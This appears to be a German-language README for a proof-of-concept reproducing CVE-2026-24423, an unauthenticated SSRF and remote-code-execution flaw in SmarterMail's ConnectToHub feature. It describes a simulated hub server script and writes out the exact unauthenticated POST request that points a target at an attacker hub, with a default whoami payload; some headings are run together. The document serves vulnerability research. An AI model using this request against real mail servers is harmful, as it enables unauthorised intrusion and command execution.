
Reproduktionsskript für CVE-2026-24423, eine Verletzung der Vertrauensgrenze in SmarterMail ConnectToHub, die zu SSRF und potenzieller Remote-Code-Ausführung führt. Enthält einen simulierten Hub-Server und Anweisungen zum Auslösen der verwundbaren API.
# CVE-2026-24423 – Reproduktion
> ⚠️ **Nur für Sicherheitsforschung und autorisierte Tests / For security research and authorized testing only**
## 简介(Überblick)
Dieses Projekt dient der Reproduktion der Schwachstelle **CVE-2026-24423**.
Die Schwachstelle existiert in der **SmarterMail ConnectToHub**-Funktion, deren Grundursache ist:
- Die Verwaltungsschnittstelle ist nicht authentifiziert
- Der Server verbindet sich aktiv mit einem vom Benutzer angegebenen Hub (SSRF)
- Die vom externen Hub zurückgegebenen Daten werden direkt für lokale systemweite Operationen verwendet
Diese Schwachstelle ist eine **Design-Level-Verletzung der Vertrauensgrenze (Trust Boundary Violation)**, die letztendlich zur Remote-Codeausführung führen kann.
Dieses Repository dient ausschließlich der **Schwachstellenverifizierung und technischen Forschung**, nicht der Waffenisierung.
Start Hub Simulation Server
python3 cve-2026-24423.py
Das Skript wird:
SystemMount-Konfiguration zurückgebenTrigger the Vulnerable API
Senden Sie die Anfrage mit Yakit oder Burp Suite:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json
{
"hubAddress": "http://ip",
"oneTimePassword": "test",
"nodeName": "victim"
}
Diese Schnittstelle erfordert keine Authentifizierung No authentication is required.
Troubleshooting
Falls die Reproduktion der Schwachstelle fehlschlägt:
MountPath in cve-2026-24423.pyResult
Wenn die Schwachstelle erfolgreich ausgelöst wird, analysiert SmarterMail die vom Hub zurückgegebenen Daten; der Standardcode führt lediglich den Befehl whoami aus.
Beispiel-Screenshot / Example:

Dieses Projekt wurde von ChatGPT erstellt.